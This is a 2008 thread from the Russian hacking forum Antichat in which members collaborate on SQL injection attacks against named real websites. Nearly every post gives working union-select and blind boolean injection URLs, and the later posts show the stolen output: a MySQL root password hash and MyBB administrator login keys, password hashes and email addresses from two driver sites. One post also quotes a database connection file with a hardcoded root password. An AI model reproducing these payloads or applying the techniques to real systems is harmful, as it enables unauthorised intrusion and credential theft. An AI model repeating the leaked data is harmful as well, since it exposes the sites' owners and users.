ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
09.08.2008, 03:46
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
В Into Outfile нельзя использовать Hex значения, только коквычки
Гы гы, connect.php
Код:
<?
$Host = "localhost";
$User = "root";
$Password = "123456";
$Database_name = "forum";
$Link = mysql_connect ($Host, $User, $Password) or die(mysql_error());
mysql_select_db($Database_name,$Link) or die(mysql_error());
?>
Мощный пароль на рута 
Последний раз редактировалось Ponchik; 09.08.2008 в 04:00..
|
|
|
09.08.2008, 03:57
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761
Репутация:
237
|
|
Код:
http://www.pixheaven.net/galerie.php?id=-5+union+select+1,2,3,4,5,6,version(),8,9+from+mysql.users/*
повидимому вслепую видно что ето версия 4.1.x
да и
Код:
SELECT command denied to user 'pixheavennet'@'10.0.85.212' for table 'users
нет доступа на чтение.. |
|
|
|
09.08.2008, 05:10
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039
Репутация:
1160
|
|
Сообщение от K1nD[e]R
Код:
http://www.pixheaven.net/galerie.php?id=-5+union+select+1,2,3,4,5,6,version(),8,9+from+mysql.users/*
повидимому вслепую видно что ето версия 4.1.x
да и
Код:
SELECT command denied to user 'pixheavennet'@'10.0.85.212' for table 'users
нет доступа на чтение.. Почему же четвертая? Если выводиться,что пятая?
http://www.pixheaven.net/galerie_us.php?id=-3+union+select+1,2,3,4,5,6,7,8,9/*
Увидишь,что принтабельно поле 7,а когда вводишь version() ,то активируется\загарается цифра ПЯДЬ 
|
|
|
|
09.08.2008, 10:46
|
|
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161
Репутация:
5
|
|
кто поможет
http://evo.nightspirits.net/indexframe.php?razdel=registration'
вот нашёл такую дыру кто скажет можно её дальше раскроить? |
|
|
|
09.08.2008, 14:05
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Сообщение от superboys
кто поможет
вот нашёл такую дыру кто скажет можно её дальше раскроить?
Код:
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(concat(version(),char(58),user()))),6,7,8,9/*
Кстати там ещё таблица users есть.
|
|
|
|
09.08.2008, 22:01
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761
Репутация:
237
|
|
Сообщение от DDoSька
Почему же четвертая? Если выводиться,что пятая?
Увидишь,что принтабельно поле 7,а когда вводишь version() ,то активируется\загарается цифра ПЯДЬ а ты введи вместо (7) цифру 3 и увидиш загоритсо цифра 3...
|
|
|
|
09.08.2008, 22:33
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
K1nD[e]R,DDoSька
Версия 5 полей с выводом нет(в этом месте), цифра которая выводится(активируется) это не вывод, но её можно использовать как индикацию true
Тоесть:
http://www.pixheaven.net/galerie_us.php?id=3+and+substring(version(),1,1)=3
цифра не активна false
http://www.pixheaven.net/galerie_us.php?id=3+and+substring(version(),1,1)=4
цифра не активна false
http://www.pixheaven.net/galerie_us.php?id=3+and+substring(version(),1,1)=5
цифра зажглась true
Или ищи вывод в другом месте, или подзапросы
|
|
|
|
10.08.2008, 01:20
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039
Репутация:
1160
|
|
Вот мой не похек (((( помогите пожалуйстА!
http://football.kapook.com/webboard_view_guest.php?qid='4595
http://mrdriver.com/device.php?id=33714'
http://driversdb.com/device.php?id=107971'
2 последних..вообще как одинаковые...
Последний раз редактировалось DDoSька; 10.08.2008 в 02:11..
|
|
|
|
10.08.2008, 01:27
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
K1nD[e]R, mysql.userS не существует. Есть mysql.user
|
|
|
|
10.08.2008, 05:21
|
|
Познающий
Регистрация: 27.05.2008
Сообщений: 51
Провел на форуме:
611529
Репутация:
41
|
|
DDoSька
http://football.kapook.com/team.php?id=13%27+union+select+1,2,3,4,5,6,7,conca t(0x3a,user,0x3a,password),9,10,11,12,13,14,15,16, 17,18,19,20+from+mysql.user/*
:root:612382396d951d43
http://mrdriver.com/device.php?id=-33714%27+union+select+version()/*
5.0.24-standard
Не будем перебирать все таблицы и посмотрим на сайт.
Стоит форум mybb пробуем табл mybb_users
http://mrdriver.com/device.php?id=-33714%27+union+select+concat(uid,0x3a,loginkey,0x3 a,password,0x3a,email,0x3a,icq)+from+mybb_users+li mit+0,1/*
1:sekysvwGmEE5uCfSHMKdK1uAUdrykTa6XkwLbNSnsxli1Q2D 7h:24a1de6ebae6c9497fac8e1c328d8fa2:webmaster@mrdr iver.com:
Всё зашифровал))) гад.
http://driversdb.com/device.php?id=-107971%27+union+select+concat(uid,0x3a,loginkey,0x 3a,password,0x3a,email,0x3a,icq)+from+mybb_users+l imit+0,1/*
1:7T6Jlse4WHMFWtJax9OsOVgLqmWoufnlzPDkCtHGFleS9YZm W4:e7cf5c7cf184622332e2bc347a38659a:forum@driversd b.com:
Последний раз редактировалось tor4); 10.08.2008 в 05:41..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для K1nD[e]R](/avatars/avatar37752.jpg?808362){kind=avatar}
![Отправить сообщение для K1nD[e]R с помощью ICQ](fusion/misc/im_icq.gif)
![Аватар для K1nD[e]R](/avatars/avatar37752.jpg?809292){kind=avatar}
Похожие темы
Линейный вид
